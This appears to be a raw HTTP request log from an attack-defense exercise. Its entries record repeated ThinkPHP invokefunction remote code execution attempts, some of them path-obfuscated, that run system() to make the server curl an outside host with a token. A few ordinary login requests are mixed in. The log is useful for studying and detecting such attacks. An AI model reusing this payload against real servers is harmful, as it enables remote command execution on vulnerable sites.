GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20http://10.0.1.2?token=KKCFJPHU HTTP/1.1
Host: 10.50.2.2
Connection: keep-alive
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

--------------------------------------------------
[19-11-22 12:31:01]
SRC IP: 10.51.6.67
GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20http://10.0.1.2?token=LBIRTMEY HTTP/1.1
Host: 10.50.2.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

--------------------------------------------------
[19-11-22 12:31:05]
SRC IP: 10.51.2.91
GET /index.php/daili/login/?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20http://10.0.1.2?token=HCWIGSKB HTTP/1.1
Host: 10.50.2.2
User-Agent: python-requests/2.19.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

--------------------------------------------------
[19-11-22 12:31:31]
SRC IP: 10.51.0.227
GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20http://10.0.1.2?token=KKCFJPHU HTTP/1.1
Host: 10.50.2.2
Connection: keep-alive
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

--------------------------------------------------
[19-11-22 12:32:29]
SRC IP: 10.51.6.126
GET /index.php?s=index/%09hink%07pp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20http://10.0.1.2?token=LBIRTMEY HTTP/1.1
Host: 10.50.2.2:80
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.19.1

--------------------------------------------------
[19-11-22 12:32:36]
SRC IP: 10.51.6.67
GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20http://10.0.1.2?token=LBIRTMEY HTTP/1.1
Host: 10.50.2.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

--------------------------------------------------
[19-11-22 12:32:37]
SRC IP: 10.51.7.46
GET //index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20http://10.0.1.2?token=BETAWOFA HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
Host: 10.50.8.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

ACCEPT-LANGUAGE: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

--------------------------------------------------
[19-11-22 12:32:37]
SRC IP: 10.51.7.46
GET //index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20http://10.0.1.2?token=BETAWOFA HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
Host: 10.50.8.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

ACCEPT-LANGUAGE: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

--------------------------------------------------
[19-11-22 12:32:37]
SRC IP: 10.51.7.46
GET //index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20http://10.0.1.2?token=BETAWOFA HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
Host: 10.50.8.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

ACCEPT-LANGUAGE: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

--------------------------------------------------
[19-11-22 12:32:37]
SRC IP: 10.51.7.46
GET //index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20http://10.0.1.2?token=BETAWOFA HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
Host: 10.50.8.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

ACCEPT-LANGUAGE: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

--------------------------------------------------
[19-11-22 12:32:37]
SRC IP: 10.51.7.46
GET //index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20http://10.0.1.2?token=BETAWOFA HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
Host: 10.50.8.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

ACCEPT-LANGUAGE: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

--------------------------------------------------
[19-11-22 12:32:38]
SRC IP: 10.51.7.46
GET //index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20http://10.0.1.2?token=BETAWOFA HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
Host: 10.50.8.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

ACCEPT-LANGUAGE: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

--------------------------------------------------
[19-11-22 12:32:43]
SRC IP: 10.51.7.46
GET //index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20http://10.0.1.2?token=BETAWOFA HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
Host: 10.50.8.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

ACCEPT-LANGUAGE: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

--------------------------------------------------
[19-11-22 12:32:56]
SRC IP: 10.51.4.9
GET /index.php/daili/login/index.html HTTP/1.1
Host: 10.50.2.2
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: PHPSESSID=95hm1fmmlgtmbd8g1du6qsn2u3
Upgrade-Insecure-Requests: 1

--------------------------------------------------
[19-11-22 12:32:56]
SRC IP: 10.51.4.9
GET /index.php/dsadmin/login/getverify/t/1574425976.html HTTP/1.1
Host: 10.50.2.2
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Referer: http://10.50.2.2/index.php/daili/login/index.html
Cookie: PHPSESSID=95hm1fmmlgtmbd8g1du6qsn2u3

--------------------------------------------------
[19-11-22 12:33:03]
SRC IP: 10.51.7.46
GET //index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20http://10.0.1.2?token=BETAWOFA HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
Host: 10.50.8.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

ACCEPT-LANGUAGE: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

--------------------------------------------------
[19-11-22 12:34:42]
SRC IP: 10.51.2.91
GET /index.php/daili/login/?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20http://10.0.1.2?token=HCWIGSKB HTTP/1.1
Host: 10.50.2.2
User-Agent: python-requests/2.19.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

--------------------------------------------------
[19-11-22 12:35:32]
SRC IP: 10.51.8.209
GET //index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20http://10.0.1.2?token=KKCFJPHU HTTP/1.1
Host: 10.50.2.2
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1

--------------------------------------------------
[19-11-22 12:35:45]
SRC IP: 10.51.6.126
GET /index.php?s=index/%09hink%07pp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20http://10.0.1.2?token=LBIRTMEY HTTP/1.1
Host: 10.50.2.2:80
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.19.1

--------------------------------------------------
[19-11-22 12:36:51]
SRC IP: 10.51.8.209
GET //index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20http://10.0.1.2?token=KZOPTUFD HTTP/1.1
Host: 10.50.2.2
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1

--------------------------------------------------
[19-11-22 12:38:54]
SRC IP: 10.51.6.67
GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20http://10.0.1.2?token=LBIRTMEY HTTP/1.1
Host: 10.50.2.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

--------------------------------------------------
[19-11-22 12:39:01]
SRC IP: 10.51.6.126
GET /index.php?s=index/%09hink%07pp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20http://10.0.1.2?token=LBIRTMEY HTTP/1.1
Host: 10.50.2.2
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.19.1

--------------------------------------------------
[19-11-22 12:39:16]
SRC IP: 10.51.8.209
GET //index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20http://10.0.1.2?token=KZOPTUFD HTTP/1.1
Host: 10.50.2.2
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1

--------------------------------------------------
[19-11-22 12:40:17]
SRC IP: 10.51.4.9
GET /index.php/daili/login/index.html HTTP/1.1
Host: 10.50.2.2
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: PHPSESSID=95hm1fmmlgtmbd8g1du6qsn2u3
Upgrade-Insecure-Requests: 1

--------------------------------------------------
[19-11-22 12:40:17]
SRC IP: 10.51.4.9
GET /index.php/dsadmin/login/getverify/t/1574426417.html HTTP/1.1
Host: 10.50.2.2
User-Agent: Mozilla/5.0 (Windows NT 6.